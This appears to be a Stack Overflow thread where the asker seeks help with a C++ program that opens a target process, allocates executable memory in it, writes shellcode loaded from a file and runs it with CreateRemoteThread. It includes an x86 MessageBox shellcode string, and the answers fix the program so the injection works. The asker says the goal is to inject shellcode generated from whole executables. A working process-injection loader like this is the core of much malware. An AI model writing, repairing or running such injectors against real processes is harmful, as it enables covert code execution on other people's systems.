1

I have a big problem that stuck me and today makes tree days trying solve. How i can load a shellcode from a binary file and inject correctly in a target process? When tested only with shellcode on own source code of program example this works fine.

Why this not works when the shellcode comes from a file? Someone already had this problem someday?

Here is the code tested (adapted from this to show a MessageBox) >

#include <windows.h>
#include <iostream>
#include <fstream>
#include <future>

using namespace std;

int main(int argc, char** argv) {

    int process_id = atoi(argv[1]);

    //MessageBox
    //char xcode[] = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\xc\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x1\xda\x8b\x52\x78\x1\xda\x8b\x72\x20\x1\xde\x31\xc9\x41\xad\x1\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x4\x72\x6f\x63\x41\x75\xeb\x81\x78\x8\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x1\xde\x66\x8b\xc\x4e\x49\x8b\x72\x1c\x1\xde\x8b\x14\x8e\x1\xda\x31\xc9\x53\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\xc\x59\x50\x51\x66\xb9\x6c\x6c\x51\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x4\xb9\x6f\x78\x41\x0\x51\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd2\x83\xc4\x10\x68\x61\x62\x63\x64\x83\x6c\x24\x3\x64\x89\xe6\x31\xc9\x51\x56\x56\x51\xff\xd0";

    vector<char> xcode;

    ifstream infile;
    infile.open("shellcode.bin", std::ios::in | std::ios::binary);
    infile.seekg(0, std::ios::end);
    size_t file_size_in_byte = infile.tellg();
    xcode.resize(file_size_in_byte);
    infile.seekg(0, std::ios::beg);
    infile.read(&xcode[0], file_size_in_byte);
    infile.close();

    HANDLE process_handle;
    DWORD pointer_after_allocated;
    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
    if (process_handle == NULL)
    {
        puts("[-]Error while open the process\n");
    }
    else {
        puts("[+] Process Opened sucessfully\n");
    }
    pointer_after_allocated = (DWORD)VirtualAllocEx(process_handle, NULL, sizeof(xcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pointer_after_allocated == NULL) {
        puts("[-]Error while get the base address to write\n");
    }
    else {
        printf("[+]Got the address to write 0x%x\n", pointer_after_allocated);
    }
    if (WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, &xcode[0] /*(LPCVOID) shellcode*/, sizeof(xcode), 0)) {
        puts("[+]Injected\n");
        puts("[+]Running the shellcode as new thread !\n");
        CreateRemoteThread(process_handle, NULL, 100, (LPTHREAD_START_ROUTINE)pointer_after_allocated, NULL, NULL, NULL);
    }
    else {
        puts("Not Injected\n");
    }
    return 0;
}
Coringa
  • 406
  • 2
  • 12
  • What does "not works" mean? Also, what is the hex value of the first byte in your file? Is it 31 or is it 5C? If the latter, you put a hexadecimal representation of your shellcode in a file instead of the shellcode itself. – Botje Oct 07 '20 at 15:20
  • @Botje, [this](https://prnt.sc/uuvz4s) is the content (`xcode.data()`) of `xcode` after loaded from file. – Coringa Oct 07 '20 at 16:35
  • 1
    So my guess is correct. You created a file containing the hexadecimal representation instead of actual binary. You need to rewrite the file such that the first three bytes have hex value "31 c9 64". Check with a hex editor. – Botje Oct 07 '20 at 16:39
  • @Botje, yes, i only copy/paste from source code to bin file. – Coringa Oct 07 '20 at 16:40
  • 1
    That is wrong. The text in your C source file is a hexadecimal representation of actual binary bytes. The compiler interprets the representation `\x31` and generates a single byte with hex value `31`. You need to do the same transformation when creating the file. The easiest way is probably to use an `ofstream` in binary mode, and then you can throw away that code again. – Botje Oct 07 '20 at 16:46
  • @Botje, "*`You need to do the same transformation when creating the file.`*" - some suggestion to automatize this with a C++ code? if yes, could show in a answer please? – Coringa Oct 07 '20 at 16:50
  • See the end of my comment. `ofstream("shellcode.bin", std::ios::binary).write(xcode, sizeof(xcode)) ;` (with `xcode` as currently defined in your question. – Botje Oct 07 '20 at 16:53
  • @Botje, "*`(with xcode as currently defined in your question.`*", what definition? this: `char xcode[] = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\xc\x8b\x70 ...";` or `vector xcode;`? – Coringa Oct 07 '20 at 17:16
  • @Botje, better a answer with complete sequence of code of read/write to file. I will accept your answer as solution if work. Remembering that i need works only with shellcode of file (after copy/paste from IDE), not is acceptable have as base `char xcode[] = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\xc\x8b\x70 ..."` to fix the problem, since that if we talking about a shellcode of a big executable file, not is possible write all it on source code of program (compiler editor) this cause a crashe of IDE. – Coringa Oct 07 '20 at 17:33
  • Normally you go the other way (binary to hex). – Botje Oct 07 '20 at 17:38
  • @Botje, [this](http://www.rohitab.com/discuss/topic/34122-c-shell-code-generator/?p=10066069) program generates shellcode of a executable file of same way that here on my question, the difference is that here shellcode is a MessageBox. Then i'm here searching help to make this format: `"\x31\xc9\x64\x8b\x41\x30\x8b\x40\xc\x8b\x70 ..."` work for both (.exe file and MessageBox). Like you know, a shellcode of a executable file not fits in a IDE :D, already explained on previous comment, this is the reason to works with shellcode in a binary file. – Coringa Oct 07 '20 at 17:58
  • Then i choose this example with MessageBox to better understad here on StackOverflow. – Coringa Oct 07 '20 at 18:00
  • But... That program does the exact opposite of what you're asking! It goes from binary to C hexadecimal encoding. The input you gave to **that** program is what you should put in shellcode.bin for **this** program. – Botje Oct 07 '20 at 18:07
  • @Botje, I think that the solution was found :D. See the section **Remotely Hosted Shellcode** [here](https://blog.f-secure.com/dynamic-shellcode-execution/). The secret is that i must change C hexadecimal encoding (`"\\x%02x"`) to `"%2hhx"` or `"0x%.2X"` before create *shellcode.bin*. – Coringa Oct 07 '20 at 19:27
  • That site talks about using `sscanf` to reinterpret text containing hex escapes back to binary. If that floats your boat, sure. – Botje Oct 07 '20 at 22:12
  • @Botje, i'm searching by a similar function in C++ to this. – Coringa Oct 07 '20 at 22:17
  • You. Don't. Need. It. You need shellcode in binary format that you can read from a file. If you are copypasting from C source code you can use the ofstream code I posted above to regenerate it, but normally you simply assemble shellcode into binary yourself. – Botje Oct 07 '20 at 22:18
  • @Botje, "*`You need shellcode in binary format that you can read from a file. If you are copypasting from C source code you can use the ofstream code I posted above to regenerate it`*" - Is you reffer to [this](https://stackoverflow.com/questions/5420317/reading-and-writing-binary-file)? – Coringa Oct 07 '20 at 22:48
  • Uh, sure. Whatever gets you to actually create a binary file and to stop focusing on the hex representation. – Botje Oct 07 '20 at 22:51
  • @Botje, Good suggestion :D. This seems really a good idea. I will try make it. – Coringa Oct 07 '20 at 23:00

1 Answers1

3

It is because you are using sizeof(xcode). In first case it is a string constant with size known at compile time. In your case, the second one, the sizeof (xcode) returns 4 (or 8 depending on architecture). You should use file_size_in_byte instead. See this piece of code:

pointer_after_allocated = (DWORD)VirtualAllocEx(process_handle, NULL, sizeof(xcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
....
if (WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, &xcode[0] /*(LPCVOID) shellcode*/, sizeof(xcode), 0))

The sizeof is meaningless in both, VirtualAllocEx and WriteProcessMemory. Consider replacing with the size of the file:

pointer_after_allocated = (DWORD)VirtualAllocEx(process_handle, NULL, file_size_in_byte, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
....
if (WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, &xcode[0], file_size_in_byte, 0))

As commented by Botje:
update 1: You can pass xcode.data() and xcode.size() instead
update 2: The C++ escape symbols \x31, four symbols (bytes), is a C++ textual hex representation of a binary byte. Is something meant to be read/edited by human. The real .bin file should not be a textual file with C++ escape symbols and can be edited with a hex editor.

armagedescu
  • 1,178
  • 2
  • 13
  • 21
  • 1
    Well spotted! I would pass `xcode.data()` and `xcode.size()` instead, to signal that they're related. – Botje Oct 07 '20 at 15:41
  • @Botje Thanks, added to answer – armagedescu Oct 07 '20 at 15:43
  • Thank you by your answer, but even after all changes, still not is showed the messagebox on target process (notepad.exe 32bit) and he crashes (like before). And the content of file is the same of `char xcode[]` initialized on own source code. – Coringa Oct 07 '20 at 16:10
  • You will only undestand when execute the code above. Only trying guess not is the right road. – Coringa Oct 07 '20 at 16:16
  • 1
    @coringa Please answer my comment on the question itself. If the first character of your file is a backslash your file is wrong. Especially because your other question shows evidence that it Is wrong. – Botje Oct 07 '20 at 16:30